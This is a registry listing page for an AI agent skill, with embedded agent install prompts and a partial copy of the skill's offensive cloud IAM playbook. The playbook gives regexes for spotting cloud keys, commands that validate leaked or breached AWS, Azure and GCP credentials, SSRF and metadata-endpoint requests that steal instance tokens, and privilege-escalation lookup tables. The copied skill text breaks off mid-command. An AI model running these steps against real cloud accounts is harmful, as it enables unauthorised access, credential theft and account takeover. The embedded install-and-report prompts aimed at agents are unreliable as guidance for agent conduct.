Creator · elementalsouls
Last updated · Sep 2, 2026
Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discovery privilege analysis. Covers IAM enumeration (aws iam, az role, gcloud iam), STS/AssumeRole chaining, Azure Managed Identity abuse (via SSRF/leak), GCP serv
Do not auto-install
Install targets
Codex install prompt
Install the "cloud-iam-deep" agent skill from https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/cloud-iam-deep. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discovery privilege analysis. Covers IAM enumeration (aws iam, az role, gcloud iam), STS/AssumeRole chaining, Azure Managed Identity abuse (via SSRF/leak), GCP service account JSON abuse, IMDSv1/v2 attacks via SSRF, K8s ServiceAccount token privilege analysis once held (token discovery / cluster exposure is owned by hunt-k8s), role-trust-policy confused-deputy, cross-account assume-role enumeration, IAM privilege escalation patterns (24+ AWS, 8+ Azure, 6+ GCP), and AWS Cognito Identity Pool unauthenticated-role attack chain (GetId → GetCredentialsForIdentity → IAM role abuse). Built for the case where recon yields a credential (key, JSON, token) and you need to know what it grants and how to escalate. Use when an AWS key / Azure secret / GCP service account JSON / K8s SA token surfaces from a code repo, JS bundle, APK, breach corpus, or SSRF chain. After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"elementalsouls-cloud-iam-deep","task":"Install cloud-iam-deep","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Deep research, source comparison, literature review, RAG, knowledge search, and reports.
Scenario
Research agents
I need my agent to research a topic, compare sources, and produce a concise report.
Agent fit
Claude Code + CLI + Codex
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add elementalsouls/Claude-BugHunter --skill cloud-iam-deep
Maintenance
fresh
6d since push
Risk
Risky
Dependency or permission surface needs review
GitHub quality
4.1K
83/100 Quality · 67/100 Trust
Coverage tags
Review notes
Dependency or permission surface needs review · Permission surface may require sandboxing
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
StrongSolid option that is likely worth shortlisting for production workflows.
Trust
Do not auto-installTrust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
Audit
RiskyA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Choose a stronger alternative or inspect the source manually before any install attempt.
Stars
4.1K GitHub stars
Repo activity
4.1K stars, 633 forks
Maintenance
6d since push
License
MIT
Install
npx skills add elementalsouls/Claude-BugHunter --skill cloud-iam-deep
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add elementalsouls/Claude-BugHunter --skill cloud-iam-deepDo not use when
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
medium
Skill may read or write project files, documents, generated artifacts, or local workspace state.
high
Skill metadata references credentials, tokens, environment variables, or secret-bearing workflows.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20cloud-iam-deep%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20cloud-iam-deep%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/elementalsouls-cloud-iam-deep/install
Agent should check
Copy prompt
Task: Use cloud-iam-deep in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20cloud-iam-deep%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/elementalsouls-cloud-iam-deep/install
Install command: npx skills add elementalsouls/Claude-BugHunter --skill cloud-iam-deep
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/elementalsouls-cloud-iam-deep/install
LLM text format
/api/skills/elementalsouls-cloud-iam-deep/install?format=text
Find alternatives
/api/skills/search?q=cloud-iam-deep&limit=3
Agent prompt
Use cloud-iam-deep for this task. Review https://www.openagentskill.com/api/skills/elementalsouls-cloud-iam-deep/install, then install with: npx skills add elementalsouls/Claude-BugHunter --skill cloud-iam-deepRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/elementalsouls-cloud-iam-deep
LLM text
/api/registry/manifest/elementalsouls-cloud-iam-deep?format=text
Install alias
/api/registry/install/elementalsouls-cloud-iam-deep
Recommend
/api/registry/recommend?task=Use%20cloud-iam-deep%20in%20an%20agent%20workflow&limit=3
Agent fit
Research agents
Platforms
Claude Code
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Use this as a leading candidate, then validate the README and install path in your own agent stack.
Role in stack
Primary pick
Primary fit
Research agents
Trust label
Production-ready
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Trust Score v5 found insufficient evidence for agent installation. Treat this as discovery material, not an executable recommendation.
GitHub adoption
PASS4.1K GitHub stars
Stars/forks activity
PASS4.1K stars, 633 forks; issue activity unavailable in current metadata
Recent maintenance
PASS6d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Choose a stronger alternative or inspect the source manually before any install attempt.
Quality profile
Solid option that is likely worth shortlisting for production workflows.
Workflow fit
Investigate faster
I need my agent to research a topic, compare sources, and produce a concise report.
Manage repositories
I need my agent to triage GitHub issues, review pull requests, and summarize repository changes.
Reduce risk
I need my agent to scan a project for security risks and summarize what needs attention.
Workflow fit
Find, compare, and synthesize
A workflow for agents that gather sources, compare claims, summarize long material, and draft useful research briefs.
Ingest, retrieve, and cite
A workflow for document-heavy agents that ingest files, create searchable knowledge, retrieve relevant context, and answer with grounded sources.
Operate and verify web apps
A workflow for agents that navigate products, fill forms, take screenshots, and verify real user flows across web applications.
Alternative shortlist
Similar skills that may fit this task.
Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
🕵️♂️ Collect a dossier on a person by username from 3000+ sites
Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.
Infisical is the open-source platform for secrets, certificates, and privileged access management.
--- name: cloud-iam-deep description: Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discovery privilege analysis. Covers IAM enumeration (aws iam, az role, gcloud iam), STS/AssumeRole chaining, Azure Managed Identity abuse (via SSRF/leak), GCP service account JSON abuse, IMDSv1/v2 attacks via SSRF, K8s ServiceAccount token privilege analysis once held (token discovery / cluster exposure is owned by hunt-k8s), role-trust-policy confused-deputy, cross-account assume-role enumeration, IAM privilege escalation patterns (24+ AWS, 8+ Azure, 6+ GCP), and AWS Cognito Identity Pool unauthenticated-role attack chain (GetId → GetCredentialsForIdentity → IAM role abuse). Built for the case where recon yields a credential (key, JSON, token) and you need to know what it grants and how to escalate. Use when an AWS key / Azure secret / GCP service account JSON / K8s SA token surfaces from a code repo, JS bundle, APK, breach corpus, or SSRF chain. sources: aws-iam-docs, azure-rbac-docs, gcp-iam-docs, hackingthe.cloud, pacu, peirates, prowler, rhinosecuritylabs_research, hackerone_public report_count: 6 ---
## When to use
Trigger when: - A cloud credential surfaces (key, secret, token, JSON file) - SSRF chain reaches IMDS / metadata endpoint - APK / git-leak reveals embedded cloud key - Recon shows public S3/GCS/Azure-blob with permissions you can verify - A Kubernetes API or service-account token is exposed - Post-RCE on a cloud-hosted instance — pivot to cloud control plane
Do NOT use for: - On-prem-only environments (use AD attack skills — but those are out of scope per external-only boundary) - Web2 vulns that happen to be on AWS — use the relevant `hunt-*` skill
---
## Credential identification (first 60 seconds)
```bash # AWS access key patterns AKIA[0-9A-Z]{16} # IAM user access key (long-term) ASIA[0-9A-Z]{16} # STS temporary credential AGPA[0-9A-Z]{16} # IAM group AIDA[0-9A-Z]{16} # IAM user (user-id) AROA[0-9A-Z]{16} # IAM role ANPA[0-9A-Z]{16} # Managed policy
# AWS secret pattern (40-char base64-ish — context required) [A-Za-z0-9/+=]{40} # AWS secret access key
# Azure AccountKey=[A-Za-z0-9+/=]{86} # Storage account key client_secret pattern + UUID # Azure AD app credential
# GCP service account JSON { "type": "service_account", "project_id": "...", "private_key_id": "...", "private_key": "-----BEGIN PRIVATE KEY-----..." }
# K8s SA token (JWT format — decode to confirm) eyJhbGciOiJSUzI1... # decode kid claim to see issuer ```
---
## AWS — read-only validation (the safe first step)
```bash # Set credential export AWS_ACCESS_KEY_ID="AKIA..." export AWS_SECRET_ACCESS_KEY="..."
# 1. WHO am I? aws sts get-caller-identity # Returns: UserId, Account, Arn # Arn tells you: IAM user vs role, account ID, name
# 2. WHAT can I do? (the privesc question) # Try common read-only first — failures still inform you aws iam list-users 2>&1 | head -5 aws iam list-roles 2>&1 | head -5 aws iam list-policies 2>&1 | head -5 aws iam list-groups 2>&1 | head -5
# 3. WHAT policies are attached to me? aws iam list-attached-user-policies --user-name <self> aws iam list-user-policies --user-name <self> # inline policies aws iam list-groups-for-user --user-name <self>
# 4. Service-by-service surface aws ec2 describe-instances --max-items 1 2>&1 | head aws s3 ls 2>&1 | head -10 aws lambda list-functions --max-items 5 2>&1 | head aws rds describe-db-instances --max-items 5 2>&1 | head aws secretsmanager list-secrets --max-results 5 2>&1 | head aws ssm describe-parameters --max-results 5 2>&1 | head
# 5. Audit any cross-account / external trust aws iam list-roles --query 'Roles[?contains(AssumeRolePolicyDocument.Statement[0].Principal.AWS, `arn:aws:iam::`)]' 2>&1 | head -20 ```
---
## AWS privesc patterns (24+ documented — `iam_privesc` techniques)
Quick lookup — if you have any of these IAM actions, escalate via the listed technique:
| You have | Escalate via | |---|---| | `iam:CreateAccessKey` | Create access key on any user → impersonate | | `iam:CreateLoginProfile` | Set a console password on a user → login | | `iam:UpdateLoginProfile` | Reset console password on a user | | `iam:AttachUserPolicy` | Attach AdministratorAccess to self | | `iam:AttachGroupPolicy` | Attach AdministratorAccess to a group you're in | | `iam:AttachRolePolicy` + sts:AssumeRole | Attach to a role you can assume | | `iam:PutUserPolicy` | Inline AdministratorAccess to self | | `iam:PutGroupPolicy` | Inline policy on a group | | `iam:PutRolePolicy` | Inline on a role you can assume | | `iam:AddUserToGroup` | Add self to admin group | | `iam:UpdateAssumeRolePolicy` + sts:AssumeRole | Modify trust to allow self | | `iam:CreatePolicyVersion` | Create v2 of an attached policy with admin | | `iam:SetDefaultPolicyVersion` | Switch attached policy to admin version | | `iam:PassRole` + ec2:RunInstances | Launch EC2 as admin role → use instance creds | | `iam:PassRole` + lambda:CreateFunction/InvokeFunction | Run code as admin role | | `iam:PassRole` + cloudformation:CreateStack | CF stack creates resources as admin | | `iam:PassRole` + glue:CreateDevEndpoint | Notebook runs as admin role | | `iam:PassRole` + datapipeline | Pipeline runs as admin role | | `iam:PassRole` + codestar:CreateProject | New project gets admin role | | `ec2:RunInstances` (with admin instance profile already on the AMI) | Spin instance, exfil creds from IMDS | | `lambda:UpdateFunctionCode` (function has admin role) | Replace code → exfil creds | | `lambda:UpdateFunctionConfiguration` | Add layer / env var that exfils | | `cloudformation:UpdateStack` | Modify stack to grant self admin | | `sts:AssumeRole` (where trust allows you) | Direct privilege jump |
Many of the destructive ones are out-of-scope for an external red-team; document the path, don't always execute.
---
## AWS — STS / cross-account / role chaining
```bash # Enumerate roles you can assume across accounts aws iam list-roles --query 'Roles[].[RoleName,AssumeRolePolicyDocument]' --output json > /tmp/roles.json # Parse for "Principal.AWS" containing different account IDs
# Assume a role aws sts assume-role --role-arn "arn:aws:iam::OTHER_ACCT:role/CrossAccountRole" --role-session-name "rt-1"
# Set new creds export AWS_ACCESS_KEY_ID="ASIA..." export AWS_SECRET_ACCESS_KEY="..." export AWS_SESSION_TOKEN="..."
# Verify aws sts get-caller-identity # should now show OTHER_ACCT
# Re-enumerate from new identity (chain continues) ```
**Confused-deputy pattern:** look for `sts:ExternalId` missing or trust policies that allow `arn:aws:iam::*:role/*`. If `ExternalId` is not required, anyone can assume the role.
---
## AWS IMDSv1 / IMDSv2 abuse via SSRF
```bash # IMDSv1 (legacy, still common — straight GET): curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns role name → fetch creds: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> # JSON with AccessKeyId, SecretAccessKey, Token, Expiration
# IMDSv2 (requires PUT to get a token first — usually mitigates SSRF): curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" TOKEN=... curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# SSRF bypass for IMDSv2: # Most server-side fetchers don't issue PUT requests → IMDSv2 blocks them. # Exception: SSRF in functions that themselves perform requests with custom headers. ```
---
## Azure — credential validation
```bash # Login with a credential az login --service-principal -u <appId> -p <password> --tenant <tenantId> # OR with managed identity (from inside Azure VM) az login --identity
# Who am I? az account show
# Subscriptions az account list --output table
# Role assignments (Azure RBAC) az role assignment list --assignee <objectId> --all az role assignment list --all --query '[?principalId==`<objectId>`]' --output table
# Resources I can read az resource list --output table | head -30 az storage account list --output table az keyvault list --output table az vm list --output table ```
---
## Azure — Managed Identity abuse
```bash # From inside Azure VM (post-RCE or SSRF to IMDS-equivalent): # Endpoint: http://169.254.169.254/metadata/identity/oauth2/token curl -H "Metadata: true" \ "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Returns access_token for the Managed Identity. Use: TOKEN="..." curl -H "Authorization: Bearer $TOKEN" "https://management.azure.com/subscriptions?api-version=2020-01-01"
# Get token for Key Vault curl -H "Metadata: true" \ "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net"
# Get token for Graph curl -H "Metadata: true" \ "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" # → If Managed Identity has Graph permissions, read all M365 data ```
---
## Azure privesc patterns
| You have | Escalate via | |---|---| | `Microsoft.Authorization/roleAssignments/write` on tenant | Self-assign Owner | | `Microsoft.Authorization/roleDefinitions/write` | Modify role def to add powers | | `Microsoft.Compute/virtualMachines/runCommand/action` | Run command on VM (with VM's MI) | | `Microsoft.KeyVault/vaults/secrets/getSecret/action` | Read all KV secrets | | `Microsoft.Storage/storageAccounts/listkeys/action` | Read all storage blobs | | `Microsoft.Web/sites/publishxml/action` | Get publish profile → RCE on app | | `Microsoft.Web/sites/host/listkeys/action` | Func app key → RCE via function trigger | | `Microsoft.AAD.Directory.* (App reg) + RoleManagement.ReadWrite.Directory` | Grant self Global Admin |
---
## GCP — service account JSON
```bash # Activate gcloud auth activate-service-account --key-file=sa-leaked.json
# Who am I? gcloud auth list gcloud config get-value account gcloud config get-value project
# What roles does this SA have? (project-level only — not org-level) gcloud projects get-iam-policy <projectId> \ --flatten="bindings[].members" \ --format="table(bindings.role)" \ --filter="bindings.members:<sa-email>"
# Service-by-service: gcloud compute instances list 2>&1 | head gcloud storage buckets list 2>&1 | head gcloud secrets list 2>&1 | head gcloud functions list 2>&1 | head gcloud sql instances list 2>&1 | head gcloud container clusters list 2>&1 | head ```
---
## GCP privesc patterns
| You have | Escalate via | |---|---| | `iam.serviceAccounts.getAccessToken` on higher-priv SA | Get token for that SA | | `iam.serviceAccounts.implicitDelegation` | Chain through delegate SAs | | `iam.serviceAccounts.signBlob` / `signJwt` on higher SA | Forge JWT for that SA | | `iam.serviceAccountKeys.create` | Create new key for any SA → impersonate | | `iam.serviceAccounts.setIamPolicy` | Grant self impersonation rights | | `iam.roles.update` (on custom role) | Add admin permissions to a role you have | | `cloudfunctions.functions.update` (function runs as high-priv SA) | Replace code → exfil creds | | `cloudfunctions.functions.call` + above | Trigger replacement | | `compute.instances.setMetadata` | Add ssh-keys metadata → SSH as root | | `compute.instances.setServiceAccount` | Attach higher-priv SA to instance | | `cloudbuild.builds.create` (build runs as project SA) | Build executes attacker code | | `deploymentmanager.deployments.create` | Resources created as DM SA |
---
## GCP IMDS attack (via SSRF or post-RCE)
```bash # GCP IMDS endpoint: curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
# Returns access token. Use: TOKEN=... curl -H "Authorization: Bearer $TOKEN" \ "https://cloudresourcemanager.googleapis.
Source provenance
Decision snapshot
4,072 GitHub stars
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for cloud-iam-deep, ready for a manual X post.
A practical pick for the next repo task: cloud-iam-deep: Cloud IAM red-team attack chain across AWS, Azure, GCP — focused on EXTERNAL exploitation paths and post-credential-discove... 4.1K stars https://www.openagentskill.com/skills/elementalsouls-cloud-iam-deep?ref=x
Listing + install path for cloud-iam-deep: https://www.openagentskill.com/skills/elementalsouls-cloud-iam-deep?ref=x Install: npx skills add elementalsouls/Claude-BugHunter --skill cloud-iam-deep
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to elementalsouls but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/elementalsouls-cloud-iam-deep?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/elementalsouls-cloud-iam-deep?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/elementalsouls-cloud-iam-deep/audit)
[](https://www.openagentskill.com/skills/elementalsouls-cloud-iam-deep?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)elementalsouls
@elementalsouls
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Do not auto-install
Wazuh
Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
16.3K StarsMaigret
🕵️♂️ Collect a dossier on a person by username from 3000+ sites
32.9K StarsNuclei
Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.
29.2K StarsInfisical
Infisical is the open-source platform for secrets, certificates, and privileged access management.
27.4K StarsPermission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Usable metadata, review docs
Risk summary
Install readiness